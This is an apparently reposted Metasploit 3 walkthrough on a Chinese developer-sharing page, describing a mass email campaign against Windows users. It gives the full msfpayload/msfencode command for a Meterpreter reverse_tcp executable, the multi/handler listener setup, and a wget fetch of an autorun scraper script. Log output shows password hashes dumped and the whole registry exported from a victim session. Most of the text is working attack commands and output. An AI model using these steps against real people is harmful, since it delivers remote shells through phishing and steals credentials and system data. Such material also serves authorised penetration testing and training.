分享程序员开发的那些事...
更新时间:2022-09-14 12:54:08
Step 1. Determine your payload delivery. In this case, we will be manually sending an email message to each target, with an executable attached. The actual "exploit"
is social engineering, but this can be replaced by any other type of remote code execution vector. To generate an executable for the test, we use msfpayload piped to msfencode.
$ msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | / msfencode -b _ -t exe -o meterpreter.exe
$ file meterpreter.exe meterpreter.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
$ ls -alrt meterpreter.exe -rw-r--r-- 1 hdm hdm 9728 Nov 17 13:24 meterpreter.exe
Step 2. Configure a shellcode handler inside Metasploit 3. Since we are targeting a wide
variety of users, we want them to connect back to us. In order to get the most amount
of information possible, we will be using the Meterpreter payload.
msf > use exploit/multi/handler msf exploit(handler) > set ExitOnSession false msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST A.B.C.D msf exploit(handler) > set LPORT 8080
Step 3. In order to make efficient use of each session, we are going to provide
Meterpreter with an "autorun" script. This script will scrape system information
from each session automatically when the session is created. One example of this
kind of script can be found at:
http://metasploit.com/users/hdm/tools/scraper.rb
msf exploit(handler) > sh -c 'cd /tmp; wget http://metasploit.com/users/hdm/tools/scraper.rb' msf exploit(handler) > set AutoRunScript /tmp/scraper.rb msf exploit(handler) > exploit -j
Step 4. Send out our email or otherwise force the Meterpreter payload to execute
on each target. At this point, results should start streaming in. Once the autorun script
completes, the session will be available from the msfconsole. The captured data will be
stored in the ~/.msf3/logs/scraper/ directory.
[*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] New session on 10.10.11.164:12188... [*] Gathering basic system information... [*] Dumping password hashes... [*] Obtaining the entire registry... [*] Exporting HKCU [*] Downloading HKCU (C:/DOCUME~1/HD/LOCALS~1/Temp/NIgfrwlC.reg) [*] Cleaning HKCU [*] Exporting HKLM [*] Downloading HKLM (C:/DOCUME~1/HD/LOCALS~1/Temp/dClzheFr.reg) [*] Cleaning HKLM [*] Exporting HKCC [*] Downloading HKCC (C:/DOCUME~1/HD/LOCALS~1/Temp/mhJZFMly.reg) [*] Cleaning HKCC [*] Exporting HKCR [*] Downloading HKCR (C:/DOCUME~1/HD/LOCALS~1/Temp/CphWxqAm.reg) [*] Cleaning HKCR [*] Exporting HKU [*] Downloading HKU (C:/DOCUME~1/HD/LOCALS~1/Temp/aHrkdFru.reg) [*] Cleaning HKU [*] Completed processing on 10.10.11.164:12188... [*] Meterpreter session 1 opened (10.10.10.26:8080 -> 10.10.11.164:12188) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: HDM-WIN/HD